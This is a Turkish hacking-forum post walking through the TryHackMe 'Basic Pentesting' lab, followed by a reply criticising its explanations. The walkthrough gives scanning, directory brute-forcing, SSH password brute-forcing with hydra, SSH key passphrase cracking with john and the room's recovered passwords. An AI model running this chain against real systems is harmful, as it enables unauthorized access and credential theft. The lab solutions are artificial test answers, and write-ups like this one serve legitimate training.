CTF | TRYHACKME

Türkiye.

Üye
28 Nis 2022
105
84
6v548jv.png

Merhabalar Bugün Tekrardan Ctf Çözeceğim İzninizle Başlıyorum
BASİC PENTESTİNG

Terminal
(ovpn bağlandıktan sonra yapılışı önceki konuda anlatmıştım)
nmap -sS -sV -sC -O -Pn ipadresi (versiyon işletim sistemi port v.s taraması yapar)
f4zb8ie.jfif

(tarama sonuçları uzun sürebilir beklemeniz gerek)
38870ot.jfif

evet sonuçlar geldi ssh shell almaya çalışacağız şimdi bu ip adresinde directory arayalım gobuster aracını kullanacağız

TERMİNAL
gobuster dir -u ipadresi -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
ve sonuçları bekleyelim yine uzun sürebilir
development geldi ipadresi://development girelim
60hnhdt.jfif



evet burda şifreli bir konuşma bulduk

TERMİNAL

enum4linux -a ipadresi

SONUÇLAR

YENİ TERMİNAL SAYFASI



hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://ipadresi -VV (sonuçlar burda çok uzun gelir)
clear
ssh jan@ipadresi
yes
armando
clear
ls
ls -la
cat .lesshst
cd ..
ls
cd kay/
ls
cat pass.bak
clear
ls -la
cd .ssh
ls
ssh -i id_rsa kay@ipadresi
yes

burda parolasız girecektik ama parola isteyecek nanodan ayar yapmamız lazım
clear
cat id rsa
8xxzp46.jfif



Buradaki metni yeni bir sayfa açıp

cd Downloads

ls

nano id rsa açın

kopyaladığınız metni buraya yapıştırın

ctrl o

ctrl x

chmod 600 id rsa (yetki verdik)

clear

john --wordlist=/usr/share/wordlists/rockyou.txt john.txt.

parola gg oldu

parola (beeswax)

ssh -i id_rsa kay@ipadresi

yes

beeswax

ls

cat pass.bak

heresareallystrongpasswordthatfollowsthepasswordpolicy$$

whoami

kay




34i6rgo.png





 

'Kyexun

Katılımcı Üye
16 Haz 2020
771
144
1. Konu yanlış yere açılmıştır. https://www.turkhackteam.org/forumlar/capture-the-flag.629/
2. Bu konuyu 1 hafta önce write up'unu paylaştım keşke biraz foruma göz gezdirip açsaydın. TryHackMe | Basic Pentesting Write Up
3. Anlatım ve görselleme konusunda destek az olmuş (bence) TryHackMe de amaç verilen soruları cevaplamakta soru cevapları nerde? Neden hydra taraması yaptın peki neden buna ihtiyaç duydun John la parola kırdın ama nasıl ne işe yarıyordu? cat komutunu kullandın ama ne ctf çözümlerine yeni başlayan birisi emin olun burdaki çoğu şeyi anlamayacaktır. Biraz daha yavaş adımlarla ilerlemek ve anlaşılır bir dil kullanmak emin olun daha iyi olucaktır.
 
Son düzenleme:
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.